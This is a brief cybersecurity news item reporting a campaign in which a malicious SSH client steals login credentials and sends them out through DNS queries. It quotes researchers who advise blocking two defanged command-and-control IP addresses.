Keep up with the latest cybersecurity threats, newly discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.
New Credential-Theft Attack Weaponizes DNS
The recently discovered campaign sends stolen data out of the network as part of a DNS query.
1 Min Read
A new credential-theft attack campaign is using DNS to exfiltrate data. The campaign, which uses an illicit SSH client to gather the credentials, sends the purloined data to a pair of command-and-control (C2) servers.
Researchers at Alert Logic have found activity from this campaign dating back to August 9. In the attack, the malicious SSH client captures login credentials and sends the data to the C2 server as part of a DNS query, not likely to be automatically stopped by standard network protection systems.
According to the blog post announcing the discovery, the attack's hashes are not yet recognized by standard endpoint protection packages. The researcher recommends blocking all traffic to 164[.]132[.]181[.]85 and 194[.]99[.]23[.]199. to protect against the campaign.
For more, read here.
Check out The Edge, Dark Reading's new section for features, threat data, and in-depth perspectives. Today's top story: "'It Saved Our Community': 16 Realistic Ransomware Defenses for Cities."
About the Author
You May Also Like
More Insights
Webinars
